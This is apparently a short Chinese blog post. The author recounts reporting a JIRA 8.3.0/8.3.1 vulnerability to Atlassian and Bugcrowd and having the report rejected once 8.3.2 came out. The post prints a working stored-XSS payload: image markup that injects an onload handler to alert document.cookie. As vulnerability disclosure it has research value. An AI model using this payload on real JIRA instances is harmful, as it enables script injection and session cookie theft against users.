前言

在JIRA v8.3.1还是最新版本的时候,通过Atlassian的邮件提交了该漏洞
然后等待了几天,Atlassian发布了v8.3.2
并告知我通过邮件自动在Service desk创建的issue已经不再使用,要去Bugcrowed提交
于是跑去Bugcrowed提交,又过了一个星期,对方表示非最新版本的漏洞不接受....
牛逼嗷 =.=

Payload

影响 JIRA v8.3.1 & 8.3.0, 对 v8.3.2 不起作用

!invalid_picture.jpg|width=405,height=304" onload="javascript:alert(document.cookie)!

Result

jira-result.png

标签: none

添加新评论